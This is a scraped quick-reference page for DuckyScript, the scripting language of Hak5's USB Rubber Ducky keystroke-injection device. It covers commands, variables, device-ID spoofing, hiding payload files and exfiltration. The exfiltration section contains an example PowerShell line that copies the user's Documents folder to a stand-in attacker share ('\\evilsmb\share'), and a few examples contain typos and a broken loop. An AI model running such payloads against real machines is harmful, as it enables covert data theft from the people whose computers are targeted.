DuckyScript™ Quick Reference
DuckyScript™ is the programming language of the USB Rubber Ducky™, Hak5® hotplug attack gear and officially licensed devices (Trademark Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved.)
Hacking Gear & Media | Hak5 Official Site
Hak5
Shop Compatible Devices
DuckyScript™ officially licensed and supported devices are backwards compatible with previous versions, excluding any device specific functionality.
E.g. DuckyScript™ 1.0 payloads written for the USB Rubber Ducky are valid DuckyScript™ 3.0 and will function on the New USB Rubber Ducky without modification
DuckyScript™ Version | Device Compatibility |
|---|---|
1.0 | Original USB Rubber Ducky (USB-A Only) |
2.X | |
3.0 | New USB Rubber Ducky (USB-A & USB-C) |
DuckyScript™ includes commands/syntax which only work on some devices. For example,
MATCH and SAVEKEYS are DuckyScript™ commands which are only for Key Croc payloads and will not work on other devices.Hak5 does NOT guarantee payload functionality for unlicensed device's, or payloads NOT compiled using Hak5 PayloadStudio
Payloads
Hak5
Hak5 Payload Hub - Featured Payloads & home of the Hak5 Payload Awards
Hak5
GitHub
Contribute and browse payloads on GitHub
Hak5 PayloadStudio
Take your DuckyScript™ payloads to the next level with this full-featured, web-based development environment.
The
REM command does not perform any keystroke injection functions. REM gets its name from the word remark. While REM may be used to add vertical spacing within a payload, blank lines are also acceptable and will not be processed by the compiler.REM This is a comment
Defining a comment block is simple! Start the comment with
REM_BLOCK and end the comment with END_REM; everything in between will be considered a comment without the need to prepend every new line with REM. Comment blocks can be especially useful when you have multiple lines to be included in a single comment or want to retain formatting.REM_BLOCK DOCUMENTATION
USAGE:
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
The
STRING command keystroke injects (types) a series of keystrokes. STRING will automatically interpret uppercase letters by holding the SHIFT modifier key where necessary. The STRING command will also automatically press the SPACE cursor key, however trailing spaces will be omitted.STRING The quick brown fox jumps over the lazy dog
The
STRINGLN command, like STRING, will inject a series of keystrokes then terminate with a carriage return (ENTER).STRINGLN _ _ _ USB _ _ _
STRINGLN __(.)< __(.)> __(.)= Rubber >(.)__ <(.)__ =(.)__
STRINGLN \___) \___) \___) Ducky! (___/ (___/ (___/
STRING blocks can be used effectively to convert multiple lines into one without needing to prepend each line with STRINGSTRING blocks strip leading white space and ignore new lines!STRING
a
b
c
END_STRING
is the equivalent of
STRING a
STRING b
STRING c
Or in this case:
STRING abcSTRINGLN blocks can be used like here-doc; allowing you to inject multiple lines as they are written in the payload. STRINGLN blocks strip the first tab but will preserve all other formattingSTRINGLN
a
b
c
END_STRINGLN
is the equivalent of
STRINGLN a
STRINGLN b
STRINGLN c
Deploying this payload will produce the following keystroke injection on the target machine:
a
b
c
The cursor keys are used to navigate the cursor to a different position on the screen.
UPDOWNLEFTRIGHTUPARROWDOWNARROWLEFTARROWRIGHTARROWPAGEUPPAGEDOWNHOMEENDINSERTDELETEDELBACKSPACETABSPACE
System keys are primarily used by the operating system for special functions and may be used to interact with both text areas and navigating the user interface.
ENTERESCAPEPAUSE BREAKPRINTSCREENMENU APPF1F2F3F4F5F6F7F8F9F0F11F12
Modifier keys held in combination with another key to perform a special function. Common keyboard combinations for the PC include the familiar
CTRL c for copy, CTRL x for cut, and CTRL v for paste. SHIFTALTCONTROLorCTRLCOMMANDWINDOWSorGUI
REM Windows Modifier Key Example
REM Open the RUN Dialog
GUI r
REM Close the window
ALT F4
In addition to the basic modifier key combinations, such as
CTRL c, modifiers and keys may be combined arbitrarily.CTRL SHIFTALT SHIFTCOMMAND CTRLCOMMAND CTRL SHIFTCOMMAND OPTIONCOMMAND OPTION SHIFTCONTROL ALT DELETE
CTRL ALT DELETE
Injecting a modifier key alone without another key — such as pressing the
WINDOWS key — may be achieved by prepending the modifier key with the INJECT_MOD command.REM Example pressing Windows key alone
INJECT_MOD WINDOWS
Lock keys toggle the lock state (on or off) and typically change the interpretation of subsequent keypresses. For example, caps lock generally makes all subsequent letter keys appear in uppercase.
CAPSLOCKNUMLOCKSCROLLOCK
The
DELAY command instructs the USB Rubber Ducky to momentarily pause execution of the payload. This is useful when deploying a payload which must "wait" for an element — such as a window — to load. The DELAY command accepts the time parameter in milliseconds.DELAY for 100 milliseconds (one tenth of a second)
DELAY 100
The minimum delay value is 20.
The
DELAY command may also accept an integer variable.VAR $WAIT = 500
DELAY $WAIT
DELAY timings might differ slightly depending on the ATTACKMODE the USB Rubber Ducky is in when executing the DELAY and depending on the target host.
By default, if no other button command is currently in use, pressing the button during payload execution will make the USB Rubber Ducky stop any further keystroke injection. It will then become an ordinary USB flash drive, commonly referred to as "arming mode".
Halts payload execution until a button press is detected. When this command is reached in the payload, no further execution will occur.
STRING Press the button...
WAIT_FOR_BUTTON_PRESS
STRING The button was pressed!
The
BUTTON_DEF command defines a function which will execute when the button is pressed anytime within the payload so long as the button control is not already in use by the WAIT_FOR_BUTTON_PRESS command or other such function.BUTTON_DEF
STRINGLN The button was pressed.
END_BUTTON
STRINGLN Press the button with the next 10 seconds
DELAY 10000
The
DISABLE_BUTTON command prevents the button from calling the BUTTON_DEF. The
ENABLE_BUTTON command allows pressing the button to call the BUTTON_DEF.
The USB Rubber Ducky includes an LED which may be helpful when deploying certain payloads where feedback is important.
The
LED_OFF command will disable all LED modes.The
LED_R command will enable the red LED.The
LED_G command will enable the green LED.
An attack mode is the device type that a USB Rubber Ducky, is functioning as or emulating. If no
ATTACKMODE command is specified as the first command (excluding REM), the HID attack mode will execute, allowing the device to function as a keyboard. The ATTACKMODE command may be run multiple times within a payload, which may cause the device to be re-enumerated by the target if the attack mode changes.ATTACKMODE Parameter | Description |
|---|---|
HID | Functions as a Human Interface Device, or Keyboard, for keystroke injection. |
STORAGE | Functions as USB Mass Storage, or a Flash Drive, for copying files to/from the target. |
HID STORAGE | Functions as both USB Mass Storage and Human Interface Device |
OFF | Will not function as any device. May be used to disconnect the device from the target. |
ATTACKMODE HID STORAGE
REM The USB Rubber Ducky will act as both a flash drive and keyboard
When using these optional parameters,
VID and PID must be used as a set. Further, MAN, PROD and SERIAL must also be used as a set.ATTACKMODE Parameter | Description |
|---|---|
VID_ | Vendor ID (16-bit HEX) |
PID_ | Product ID (16-bit HEX) |
MAN_ | Manufacturer (32 alphanumeric characters) |
PROD_ | Product (32 alphanumeric characters) |
SERIAL_ | Serial (12 digits) |
ATTACKMODE HID VID_046D PID_C31C MAN_HAK5 PROD_DUCKY SERIAL_1337
REM Emulated a Keyboard with the following values:
REM - Vendor ID: 046D
REM - Product ID: C31C
REM - Manufacturer: HAK5
REM - Product: DUCKY
REM - Serial: 1337
The
SAVE_ATTACKMODE command will save the currently running ATTACKMODE state (including any specified VID, PID, MAN, PROD and SERIAL parameters) such that it may be later restored.The
RESTORE_ATTACKMODE command will restore a previously saved ATTACKMODE state.ATTACKMODE HID VID_046D PID_C31C MAN_HAK5 PROD_DUCKY SERIAL_1337
DELAY 2000
SAVE_ATTACKMODE
STRING Hello
ATTACKMODE OFF
DELAY 5000
RESTORE_ATTACKMODE
DELAY 2000
STRING , World!
The
DEFINE command is used to define a constant. One may consider the use of a DEFINE within a payload like a find-and-replace at time of compile.DEFINE #WAIT 2000
DEFINE #TEXT Hello World
DEFINE #MYURL example.com
DELAY #WAIT
STRINGLN #TEXT
STRING https://#MYURL
The
VAR command will initiate a variable. Unlike constants, variables begin with a dollar sign ("$"). Variables contain unsigned integers with values from 0 to 65535. Booleans may be represented as well, either by TRUE/FALE or any non-zero number and 0 respectively.VAR $BLINK = TRUE
VAR $BLINK_TIME = 1000
Operators instruct the payload to perform a given mathematical, relational or logical operation.
Operator | Meaning |
|---|---|
= | Assignment |
+ | Add |
- | Subtract |
* | Multiply |
/ | Divide |
% | Modulus |
^ | Exponent |
VAR $FOO = 1337
$FOO = ( $FOO - 1295 )
REM $FOO was assigned 1337, subtracted 1295, and ended up equalling 42.
Will compare two values to evaluate a single boolean value.
Operator | Meaning |
|---|---|
== | Equal to |
!= | Not equal to |
> | Greater than |
< | Less than |
>= | Greater than or equal to |
<= | Less than or equal to |
VAR $FOO = 42
VAR $BAR = 1337
IF ( $FOO < $BAR ) THEN
STRING 42 is less than 1337
END_IF
Parentheses
( ) are required to define the precedence conventions.VAR $FOO = 42
VAR $BAR = (( 100 * 13 ) + ( $FOO - 5 ))
Logical operators may be used to connect two or more expressions.
Operator | Description |
|---|---|
&& | Logical AND. If both the operands are non-zero, the condition is TRUE. |
|| | Logical OR. If any of the two operands is non-zero, the condition is TRUE. |
VAR $FOO = 42
VAR $BAR = 1337
IF ( $FOO < $BAR ) || ( $BAR == $FOO ) THEN
STRING Either 42 is less than 1337 or 42 is equal to 1337
END_IF
When assigning a value to a variable, the variable itself may be referenced.
VAR $FOO = 1336
VAR $FOO = ( $FOO + 1 )
Operate on the uint16 values at the binary level.
Operator | Description |
|---|---|
& | Bitwise AND. If the corresponding bits of the two operands is 1, will result in 1. Otherwise if either bit of an operand is 0, the result of the corresponding bit is evaluated as 0. |
| | Bitwise OR. If at least one corresponding bit of the two operands is 1, will result in 1. |
>> | Right Shift. Accepts two numbers. Right shifts the bits of the first operand. The second operand determines the number of places to shift. |
<< | Left Shift. Accepts two numbers. Left shifts the bits of the first operand. The second operand decides the number of places to shift. |
ATTACKMODE HID STORAGE VID_05AC PID_021E
VAR $FOO = $_CURRENT_VID
REM Because VID and PID parameters are little endian,
$FOO = ((($FOO >> 8) & 0x00FF) | (($FOO << 8) & 0xFF00))
REM $FOO will now equal 0xAC05
Conditional statements, loops and functions allow for dynamic execution.
The flow control statement
IF will determine whether or not to execute its block of code based on the evaluation of an expression. One way to interpret an IF statement is to read it as "IF this condition is true, THEN do this".$FOO = 42
$BAR = 1337
IF ( $FOO < $BAR ) THEN
STRING 42 is less than 1337
END_IF
The
ELSE statement is an optional component of the IF statement which will only execute when the IF statement condition is FALSE.IF ( $_CAPSLOCK_ON == TRUE ) THEN
STRING Capslock is on!
ELSE IF ( $_CAPSLOCK_ON == FALSE ) THEN
STRING Capslock is off!
END_IF
Loops are flow control statements that can be used to repeat instructions until a specific condition is reached.
The block of code within the
WHILE statement will continue to repeatedly execute for a number of times (called iterations) for as long as the condition of the WHILE statement is TRUE. VAR $FOO = 42
WHILE ( $FOO > 0 )
STRINGLN This message will repeat 42 times.
$FOO = ( $FOO - 1 )
END_WHILE
WHILE TRUE
SRINGLN This is an infinite loop. This message repeats forever.
END_WHILE
Functions are blocks of organized single-task code that let you more efficiently run the same code multiple times without the need to copy and paste large blocks of code over and over again.
REM Types "Hello.....World!"
FUNCTION COUNTDOWN()
WHILE ($TIMER > 0)
STRING .
$TIMER = ($TIMER - 1)
DELAY 500
END_WHILE
END_FUNCTION
STRING Hello
VAR $TIMER = 5
COUNTDOWN()
STRING World!
A function may return a integer or boolean value which may also be evaluated.
FUNCITON TEST_CAPS_AND_NUM()
IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == TRUE)) THEN
RETURN TRUE
ELSE
RETURN FALSE
END_IF
END_FUNCTION
IF (TEST_CAPS_AND_NUM() == TRUE) THEN
STRINGLN Caps lock and num lock are on.
END_IF
The pseudorandom number generator provides randomization for keystroke injection, variables and attackmode parameters. The first time a randomization feature is used, a
seed.bin will be generated on the root of the MicroSD card. One may also be generated from the Hak5 IDE.Command | Character Set |
|---|---|
RANDOM_LOWERCASE_LETTER | abcdefghijklmnopqrstuvwxyz |
RANDOM_UPPERCASE_LETTER | ABCDEFGHIJKLMNOPQRSTUVWXYZ |
RANDOM_LETTER | abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ |
RANDOM_NUMBER | 0123456789 |
RANDOM_SPECIAL | [email protected]#$%^&*() |
RANDOM_CHAR | abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ
0123456789
[email protected]#$%^&*() |
REM 42 random characters
VAR $COUNT = 42
WHILE ($COUNT > 0)
RANDOM_CHAR
$COUNT = ($COUNT + 1)
END_WHILE
The internal variable
$_RANDOM_INT assigns a random integer between the specified $_RANDOM_MIN and $_RANDOM_MAX values. May be 0-65535. The default values are 0-9. $_RANDOM_MIN = 42
$_RANDOM_MAX = 1337
VAR $FOO = $_RANDOM_INT
REM The variable $FOO will be between 42 and 1337
The
ATTACKMODE command may accept random values for the optional parameters.ATTACKMODE Parameter | Result |
|---|---|
VID_RANDOM | Random Vendor ID |
PID_RANDOM | Random Product ID |
MAN_RANDOM | Random 12 alphanumeric character iManufacturer |
PROD_RANDOM | Random 12 alphanumeric character iProduct |
SERIAL_RANDOM | Random 12 digit serial number |
ATTACKMODE HID VID_RANDOM PID_RANDOM MAN_RANDOM PROD_RANDOM SERIAL_RANDOM
Use caution when using random
VID and PID values as unexpected results are likely.
A key may be held, rather than pressed, by specifying a
HOLD and RELEASE command with a DELAY in between the two. Both HOLD and RELEASE must specify a key. Multiple simultaneous keys may be held.HOLD a
DELAY 2000
RELEASE a
REM May produce any mumber of "aaaaa" keys, depending on the repeat rate of
REM the target OS. On macOS may open the accent menu.
INJECT_MOD
HOLD WINDOWS
DELAY 4000
RELEASE WINDOWS
REM Will hold the Windows key for 4 seconds. Note the use of INJECT_MOD
REM when using a modifier key without a key combination.
These simple commands exist to control the execution of a payload.
The
RESTART_PAYLOAD command ceases execution, restarting the payload from the beginning.The
STOP_PAYLOAD command ceases and further execution.The
RESET command clears the keystroke buffer, useful for debugging complex hold key states.
Jitter randomly varies the delay between individual key presses based on the
seed.bin value.Internal Variable | Description |
|---|---|
$_JITTER_ENABLED | Set TRUE to enable and FALSE to disable jitter. |
$_JITTER_MAX | Integer (0-65535) of maximum time in milliseconds between keystrokes. Default 20. |
$_JITTER_MAX = 60
$_JITTER_ENABLED = TRUE
STRINGLN The quick brown fox jumps over the lazy dog
The
inject.bin and seed.bin file may be hidden from the MicroSD card before implementing ATTACKMODE STORAGE. The HIDE_PAYLOAD and RESTORE_PAYLOAD commands must be run while using ATTACKMODE OFF or ATTACKMODE HID.Hides the inject.bin and seed.bin files from the MicroSD card.
Restores the inject.bin and seed.bin files to the MicroSD card.
ATTACKMODE OFF
HIDE_PAYLOAD
ATTACKMODE HID STORAGE
DELAY 2000
STRINGLN The payload files are hidden.
ATTACKMODE HID
RESTORE_PAYLOAD
DELAY 2000
STRINGLN Restoring the payload files...
ATTACKMODE HID STORAGE
DELAY 2000
STRINGLN The payload files have been restored.
USB HID devices contain both IN endpoints for data (keystrokes) from the keyboard to computer, and OUT endpoints for data (LED states) from the computer to the keyboard. In many cases the LED state control codes sent from the computer to the attached keyboard are sent to all attached "keyboards". Versions of macOS behave differently.
Command | Description |
|---|---|
WAIT_FOR_CAPS_ON | Pause until caps lock is turned on |
WAIT_FOR_CAPS_OFF | Pause until caps lock is turned off |
WAIT_FOR_CAPS_CHANGE | Pause until caps lock is toggled on or off |
WAIT_FOR_NUM_ON | Pause until num lock is turned on |
WAIT_FOR_NUM_OFF | Pause until num lock is turned off |
WAIT_FOR_NUM_CHANGE | Pause until num lock is toggled on or off |
WAIT_FOR_SCROLL_ON | Pause until scroll lock is turned on |
WAIT_FOR_SCROLL_OFF | Pause until scroll lock is turned off |
WAIT_FOR_SCROLL_CHANGE | Pause until scroll lock is toggled on or off |
STRINGLN Hello,
STRINGLN [Press caps lock to continue...]
WAIT_FOR_CAPS_CHANGE
STRINGLN World!
The currently reported lock key states may be saved and later recalled using the
SAVE_HOST_KEYBOARD_LOCK_STATE and RESTORE_HOST_KEYBOARD_LOCK_STATE commands. REM Save the LED states of the primary keyboard
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Change the lock states
CAPSLOCK
NUMLOCK
REM Restore the original lock states
RESTORE_HOST_KEYBOARD_LOCK_STATE
Exfiltration is the unauthorized transfer of information from a system. Typically performed over a physical medium (copying to a USB flash disk such as the USB Rubber Ducky while using
ATTACKMODE STORAGE) or a network medium such as email, ftp, smb, http, etc.ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 100
STRING powershell "$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRINGLN echo $env:computername >> $m:\computer_names.txt"
ATTACKMODE HID
DELAY 2000
GUI r
DELAY 100
STRINGLN powershell "cp -r $env:USERPROFILE\Documents\* \\evilsmb\share"
By taking advantage of the HID OUT endpoint as described in the lock keys section, binary data may be exfiltrated "out of band" using the Keystroke Reflection side-channel attack. This is done by using the
$_EXFIL_MODE_ENABLED internal variable. The reflected lock keystrokes are saved to loot.bin on the root of the MicroSD card. For a detailed example, see the section on Keystroke Reflection.Similarly, arbitrary variable data may be saved to the
loot.bin file using the EXFIL command.VAR $FOO = 1337
EXFIL $FOO
Internal Variable | Description |
|---|---|
BUTTON | |
$_BUTTON_ENABLED | Returns TRUE if the button is enabled or FALSE if the button is disabled. |
$_BUTTON_USER_DEFINED | Returns TRUE if a BUTTON_DEF has been implemented in the payload or FALSE if it hasn't been implemented. |
$_BUTTON_PUSH_RECEIVED | Returns TRUE if the button has ever been pressed. May be retrieved or set. |
$_BUTTON_TIMEOUT | The button debounce, or cooldown time before counting the next button press, in milliseconds. The default value is 1000. |
LED | |
$_SYSTEM_LEDS_ENABLED | Default set TRUE. May be retrieved or set. Boot and ATTACKMODE change LED. |
$_STORAGE_LEDS_ENABLED | Default set TRUE. May be retrieved or set.Blinks the LED red/green on storage read/write in ATTACKMODE STORAGE. |
$_LED_CONTINUOUS_SHOW_STORAGE_ACTIVITY | Default set TRUE. May be retrieved or set.The LED will light solid green when the storage has been inactive for longer than $ _STORAGE_ACTIVITY_TIMEOUT (default 1000 ms). Otherwise, the LED will light red when active. |
$_INJECTING_LEDS_ENABLED | Default set TRUE. May be retrieved or set. When TRUE the LED will blink green on payload execution. |
$_EXFIL_LEDS_ENABLED | Default set TRUE. May be retrieved or set. When TRUE the LED will blink green during Keystroke Reflection. |
$_LED_SHOW_CAPS | Default set FALSE. May be retrieved or set. When TRUE will bind the GREEN LED state to the CAPSLOCK state. |
$_LED_SHOW_NUM | Default set FALSE. May be retrieved or set. When TRUE will bind the RED LED state to the NUMLOCK state. |
$_LED_SHOW_SCROLL | Default set FALSE. May be retrieved or set. When TRUE will bind the GREEN LED state to the SCROLLLOCK state. |
ATTACKMODE | |
$_CURRENT_VID | Returns the currently operating Vendor ID with endian swapped. May only be retrieved. Cannot be set. |
$_CURRENT_PID | Returns the currently operating Product ID with endian swapped. May only be retrieved. Cannot be set. |
$_CURRENT_ATTACKMODE | Returns the currently operating ATTACKMODE represented as 0 for OFF, 1 for HID, 2 for STORAGE and 3 for both HID and STORAGE |
RANDOM | |
$_RANDOM_INT | Random integer within set range. |
$_RANDOM_MIN | Random integer minimum range (unsigned, 0-65535) |
$_RANDOM_MAX | Random integer maximum range (unsigned, 0-65535) |
$_RANDOM_SEED | Random seed from seed.bin |
$_RANDOM_LOWER_LETTER_KEYCODE | Returns random lower letter scancode (a-z) |
$_RANDOM_UPPER_LETTER_KEYCODE | Returns random upper letter scancode (A-Z) |
$_RANDOM_LETTER_KEYCODE | Returns random letter scancode (a-zA-Z) |
$_RANDOM_NUMBER_KEYCODE | Returns random number scancode (0-9) |
$_RANDOM_SPECIAL_KEYCODE | Returns random special char scancode (shift+0-9) |
$_RANDOM_CHAR_KEYCODE | Returns random letter number or special scancode |
JITTER | |
$_JITTER_ENABLED |